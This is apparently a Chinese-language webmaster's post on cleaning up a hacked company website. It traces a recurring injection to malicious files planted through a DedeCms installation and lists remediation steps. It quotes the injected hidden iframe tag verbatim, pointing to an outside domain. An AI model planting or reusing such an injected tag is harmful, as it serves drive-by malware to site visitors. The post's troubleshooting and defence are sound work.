打开公司网站首页,360和杀毒软件就对一个网页进行了劫持,怎么网页受到了病毒侵害呢。通过浏览器查看网页的源代码,发现了一段陌生的代码
<iframe src=http://www.wyf006.cn/one/a9.htm width=50 height=0 border=0></iframe>
一看到这段代码,就想起了之前曾经遭遇的Iframe攻击,一种ARP病毒,当时就是由于内网的一台机器感染了ARP病毒,然后不断的进行发包,造成了每台机器在打开网页的时候,都会出现错误,最根本的特征就是在网页中插入这样一条类似的iframe代码,将一个广告网页嵌入进来。当时的解决方案:
<1>开启ARP保护
<2>清理一切临时文件,包括IE和系统的,特别是IE,很多缓存的页面可能已经感染了病毒。
<3>修复系统漏洞,可以用360的系统修复功能
<4>进行一次全面的杀毒处理,最好寻得专杀工具进行一次全面杀毒
然后我就按着头脑中已定的逻辑去逐步操作,本以为这样就可以解决问题了,但是再处理之后,将那段攻击代码 删除之后,过了没多久又重新被挂马。我也寻得多种木马专杀等工具进行查杀,但是并没有找到问题的根源。
然后我只得到网络上寻得救援。
在不经意间,我发现了,可能与DedeCms有关。一想我的程序应该没有多大问题,而且偏偏攻击的是我的主页,静态页面,而公司网站也有设计部使用DedeCms系统进行管理和维护。
在这个启蒙下,感觉寻得一丝曙光。然后我就让设计部着手去寻得问题的根源
<1>进入DedeCms管理系统,查看文件,找寻可疑文件。
果然,在仔细搜寻一番之后,发现很多陌生文件的,有的文件以2008为名,有的以简单aa,bb为名,这些可疑文件的命名很不规范,有的是JS文件,有的是PHP,有的是HTML,看来这就是毒源了。查看里面的代码,发现一般都是乱码。 将这些可疑文件全部删除。
<2>看来问题真的出在这里,然后,升级DedeCms,修复系统漏洞
<3>关闭一些不用的功能,会员功能等。
<4>将权限进行重新划分,对于一些具有写入权限的目录一定要严格限制。